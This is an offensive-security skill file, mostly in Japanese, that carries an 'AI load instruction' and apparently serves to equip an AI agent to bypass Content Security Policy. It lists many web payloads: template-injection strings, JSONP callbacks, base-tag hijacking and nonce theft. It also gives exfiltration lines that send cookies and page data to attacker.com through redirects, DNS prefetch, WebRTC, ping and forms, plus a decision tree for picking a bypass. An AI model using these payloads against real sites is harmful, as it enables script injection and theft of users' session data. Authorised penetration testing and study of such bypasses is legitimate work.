SKILL: CSP Bypass — Advanced Techniques

AI LOAD INSTRUCTION: Covers per-directive bypass techniques, nonce/hash abuse, trusted CDN exploitation, data exfiltration despite CSP, and framework-specific bypasses. Base models often suggest unsafe-inline bypass without checking if the CSP actually uses it, or miss the critical base-uri and object-src gaps.

0. RELATED ROUTING

• xss-cross-site-scripting XSS ベクターの詳細（CSP 回避後の配信方法）
• dangling-markup-injection CSP がスクリプトをブロックしても HTML インジェクションが存在する場合 — JavaScript なしでの流出
• crlf-injection CRLF が CSP ヘッダーを挿入できる、または応答分割経由で nonce を盗める場合
• waf-bypass-techniques WAF と CSP の両方を回避する必要がある場合
• clickjacking CSP が frame-ancestors に欠ける場合 — クリックジャッキングが依然可能

---

1. CSP ディレクティブ リファレンス マトリックス

ディレクティブ	制御対象	デフォルトフォールバック
default-src	明示的に設定されていないすべての -src ディレクティブのフォールバック	なし（ブラウザのデフォルト：すべて許可）
script-src	JavaScript 実行	default-src
style-src	CSS 読み込み	default-src
img-src	画像読み込み	default-src
connect-src	XHR、fetch、WebSocket、EventSource	default-src
frame-src	iframe/frame ソース	default-src
font-src	フォント読み込み	default-src
object-src	<object>、<embed>、<applet>	default-src
media-src	<audio>、<video>	default-src
base-uri	<base> 要素	フォールバックなし — 不在の場合は無制限
form-action	フォーム送信先	フォールバックなし — 不在の場合は無制限
frame-ancestors	このページを埋め込めるのは誰か（X-Frame-Options を置換）	フォールバックなし — 不在の場合は無制限
report-uri / report-to	違反レポート送信先	N/A
navigate-to	ナビゲーション先（ブラウザサポート限定）	フォールバックなし

重要な洞察: base-uri、form-action、frame-ancestors は default-src にフォールバックしません。これらが欠けている場合、常に潜在的な回避ベクトルです。

---

2. ディレクティブ別の回避技法

2.1 script-src 'self'

アプリケーションは自身のオリジンからのスクリプトのみを許可します。回避ベクトル：

ベクトル	技法
JSONP エンドポイント	<script src="/api/jsonp?callback=alert(1)//"></script> — JSONP がコールバックを JS として反映
アップロード済み JS ファイル	.js ファイルをアップロード（例：アバターアップロードが任意の拡張子を受け入れる）→ <script src="/uploads/evil.js"></script>
DOM XSS シンク	既存の同一オリジン JS 内の DOM シンク（innerHTML、eval、document.write）を探す — URL フラグメント/パラメータ経由でインジェクト
Angular/Vue テンプレートインジェクション	フレームワークが 'self' から読み込まれている場合、テンプレート式をインジェクト：{{constructor.constructor('alert(1)')()}}
Service Worker	同一オリジンから SW を登録 → レスポンスを傍受・修正
パス混淆	<script src="/user-content/;/legit.js"> — サーバーがパース誤りでユーザーコンテンツを返すが、URL は 'self' にマッチ

2.2 CDN ホワイトリスト付き script-src

script-src 'self' *.googleapis.com *.gstatic.com cdn.jsdelivr.net

ホワイトリスト済み CDN	回避方法
cdnjs.cloudflare.com	CDNJS 経由で任意の JS をホスト（コールバック/eval のあるライブラリを検索）：angular.js → テンプレートインジェクション
cdn.jsdelivr.net	jsdelivr は任意の npm パッケージまたは GitHub ファイルを配信：cdn.jsdelivr.net/npm/attacker-package@1.0.0/evil.js
*.googleapis.com	Google JSONP エンドポイント、Google Maps コールバックパラメータ
unpkg.com	jsdelivr と同じ — 任意の npm パッケージを配信
*.cloudfront.net	CloudFront ディストリビューションは共有 — いかなる CF 顧客の JS も許可される

トリック: ホワイトリスト済みドメインで JSONP エンドポイントを検索：site:googleapis.com inurl:callback

2.3 script-src 'unsafe-eval'

eval()、Function()、setTimeout(string)、setInterval(string) がすべて許可されます。

// テンプレートインジェクション → ブラウザ内の RCE 相当
[].constructor.constructor('alert(document.cookie)')()

// JSON.parse はコードを実行しませんが、結果が eval コンテキストで使われる場合：
// アプリケーションが実行：eval('var x = ' + JSON.parse(userInput))

2.4 script-src 'nonce-xxx'

マッチング nonce 属性を持つスクリプトのみが実行されます。

回避方法	条件
Nonce 再利用	サーバーがリクエスト全体またはすべてのユーザーで同じ nonce を使用 → 予測可能
CRLF 経由の nonce インジェクション	レスポンスヘッダー内の CRLF → 既知の nonce を持つ新しい CSP ヘッダーをインジェクト、または <script nonce="known"> をインジェクト
dangling markup で nonce を盗む	<img src="https://attacker.com/steal? （閉じられていない）→ ページコンテンツ（nonce を含む）が URL パラメータとして流出
DOM clobbering	nonce チェックコードを DOM clobbering で上書き：<form id="nonce"><input id="nonce" value="attacker-controlled">
スクリプト gadget	trusted nonced スクリプトが DOM データを使用して新しいスクリプト要素を作成 — その DOM データをインジェクト

2.5 script-src 'strict-dynamic'

信頼の伝播：既に信頼されたスクリプトによって作成されたスクリプトも、ソースに関わらず信頼されます。

回避方法	技法
base-uri インジェクション	<base href="https://attacker.com/"> → 相対スクリプト src が攻撃者ドメインに解決。Trusted parent スクリプトが ./lib.js をロード、現在は https://attacker.com/lib.js を指す
Trusted コード内のスクリプト gadget	Trusted スクリプトが document.createElement('script'); s.src = location.hash.slice(1) を実行 → URL フラグメント経由でコントロール
Trusted スクリプト内の DOM XSS	Trusted スクリプトがユーザー制御ソースから innerHTML を読む → インジェクトされた <script> は strict-dynamic 経由で信頼されます

2.6 Angular / Vue CSP 回避

Angular（CSP 付き）:

<!-- angular.js がホワイトリストされている場合、Angular テンプレート式は script-src をバイパス -->
<div ng-app ng-csp>
  {{$eval.constructor('alert(1)')()}}
</div>

<!-- Angular >= 1.6 サンドボックス削除、よりシンプル： -->
{{constructor.constructor('alert(1)')()}}

Vue.js:

<!-- Vue 2 ランタイムコンパイラ付き -->
<div id=app>{{_c.constructor('alert(1)')()}}</div>
<script src="https://whitelisted-cdn/vue.js"></script>
<script>new Vue({el:'#app'})</script>

2.7 object-src 欠落

object-src が設定されていない（default-src にフォールバック）、かつ default-src がいくつかのオリジンを許可する場合：

<!-- Flash ベースの回避（レガシー、ほぼパッチ済みだが古いシステムに依然存在） -->
<object data="https://attacker.com/evil.swf" type="application/x-shockwave-flash">
  <param name="AllowScriptAccess" value="always">
</object>

<!-- PDF プラグイン悪用 -->
<embed src="/user-upload/evil.pdf" type="application/pdf">

2.8 base-uri 欠落

<!-- base タグをインジェクト → すべての相対 URL が攻撃者に解決 -->
<base href="https://attacker.com/">

<!-- 既存スクリプト：<script src="/js/app.js"> -->
<!-- 現在ロード：https://attacker.com/js/app.js -->

これは相対スクリプトパスの 'nonce-xxx'、'strict-dynamic'、script-src 'self' をバイパスします。

2.9 frame-ancestors 欠落

frame-ancestors のない CSP → ページがフレーム化可能 → クリックジャッキング可能。

X-Frame-Options ヘッダーは CSP の frame-ancestors によって上書きされます。しかし CSP が frame-ancestors なしで存在する場合、一部のブラウザは XFO を完全に無視します。

---

3. META タグ vs. ヘッダーの CSP

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">

Meta タグの制限:

• frame-ancestors を設定できない（meta では無視）
• report-uri / report-to を設定できない
• sandbox を設定できない
• HTML インジェクション経由で meta タグが DOM 順序で 前に インジェクトされた場合、攻撃者の meta CSP が最初に処理される可能性（ブラウザは最初に遭遇したものを使用）
• ページにヘッダー CSP と meta CSP の両方がある場合、両方が適用 されます（最も制限的なものが勝利）

---

4. CSP に関わらずデータ流出

connect-src、img-src などがロックダウンされている場合、代替流出チャネル：

チャネル	ブロックするのに必要な CSP ディレクティブ	技法
DNS プリフェッチ	なし（CSP は DNS をブロックできない）	<link rel="dns-prefetch" href="//data.attacker.com">
WebRTC	なし（CSP はブロックできない）	new RTCPeerConnection({iceServers:[{urls:'stun:attacker.com'}]})
<link rel=prefetch>	default-src または connect-src	CSP では見落とされることが多い
リダイレクトベース	navigate-to （めったに設定されない）	location='https://attacker.com/?'+document.cookie
CSS インジェクション	style-src	<style>body{background:url(https://attacker.com/?data)}</style>
<a ping>	connect-src	<a ping="https://attacker.com/collect" href="#">click</a>
report-uri 流出	N/A	CSP 違反をトリガー → レポートにブロックされた URI が含まれる
フォーム送信	form-action	<form action="https://attacker.com/"><button>Submit</button></form>

DNS ベースの流出は CSP でブロックするのがほぼ不可能 — これが最も信頼できるチャネルです。

---

5. CSP 回避判断木

CSP 存在？
├── 完全なポリシーを読む（レスポンスヘッダー + meta タグ）
│
├── 明らかな脆弱性をチェック
│   ├── script-src に 'unsafe-inline' ？ → 標準 XSS が機能
│   ├── script-src に 'unsafe-eval' ？ → eval/Function/setTimeout 回避
│   ├── script-src に * または data: ？ → <script src="data:,alert(1)">
│   └── 一部のページに CSP ヘッダーなし？ → CSP 不在のページを探す
│
├── 欠落ディレクティブをチェック
│   ├── base-uri なし？ → <base href="https://attacker.com/"> → 相対スクリプトをハイジャック
│   ├── object-src なし？ → Flash/プラグイン ベースの回避（レガシー）
│   ├── form-action なし？ → フォーム送信経由での流出
│   ├── frame-ancestors なし？ → クリックジャッキング可能
│   └── connect-src が lax な default-src にフォールバック？ → fetch/XHR 流出
│
├── script-src 'self' ？
│   ├── 同一オリジン内の JSONP エンドポイントを探す
│   ├── ファイルアップロードを探す → .js ファイルをアップロード
│   ├── 既存の同一オリジン スクリプト内の DOM XSS を探す
│   └── 自身から読み込まれた Angular/Vue を探す → テンプレートインジェクション
│
├── CDN ホワイトリスト付き script-src ？
│   ├── CDN で JSONP エンドポイントをチェック
│   ├── jsdelivr/unpkg/cdnjs をチェック → 攻撃者制御パッケージをロード
│   └── *.cloudfront.net をチェック → 共有ディストリビューション名前空間
│
├── script-src 'nonce-xxx' ？
│   ├── Nonce がリクエスト全体で再利用されている？ → リプレイ
│   ├── CRLF インジェクション利用可能？ → Nonce をインジェクト
│   ├── Dangling markup で nonce を盗む
│   └── Trusted スクリプト内のスクリプト gadget
│
├── script-src 'strict-dynamic' ？
│   ├── base-uri が設定されていない？ → <base> ハイジャック
│   ├── Trusted スクリプト内の DOM XSS ？ → 信頼を継承
│   └── DOM データから動的スクリプトを作成するスクリプト gadget
│
└── すべてのスクリプト実行がブロックされている？
    ├── Dangling markup インジェクション → JS なしで流出（../dangling-markup-injection/SKILL.md 参照）
    ├── DNS プリフェッチ流出
    ├── WebRTC 流出
    ├── データ抽出用 CSS インジェクション
    └── フォームアクション流出

---

6. トリックノート — AI モデルが見落とすもの

1. default-src 'self' は base-uri または form-action を制限しない — これらはフォールバックなし。これが #1 CSP ミス。
2. strict-dynamic はホワイトリストを無視: strict-dynamic が存在する場合、ホストベースの許可リストと 'self' はスクリプト読み込みで無視されます。Nonce/hash と信頼の伝播のみが重要。
3. 複数の CSP はスタック: Content-Security-Policy ヘッダーと <meta> CSP の両方が存在する場合、ブラウザは両方を実行 — 実効ポリシーは交差（最も制限的）。
4. Content-Security-Policy-Report-Only は強制されない — レポートのみ。正しいヘッダー名をチェック。
5. Nonce 長は重要: Nonce は ≥128 ビットのエントロピーであるべき。短いまたは予測可能な nonce はブルートフォース/推測可能。
6. Report-uri 情報開示: report-uri に送信された CSP 違反レポートには blocked-uri、source-file、line-number が含まれます — これはレポート エンドポイントを制御する者に内部 URL、スクリプトパス、ページ構造を漏らす可能性があります。
7. script-src 内の data:: script-src 'self' data: は <script src="data:text/javascript,alert(1)"> を許可 — 簡単な回避だが、実世界の CSP で一般的。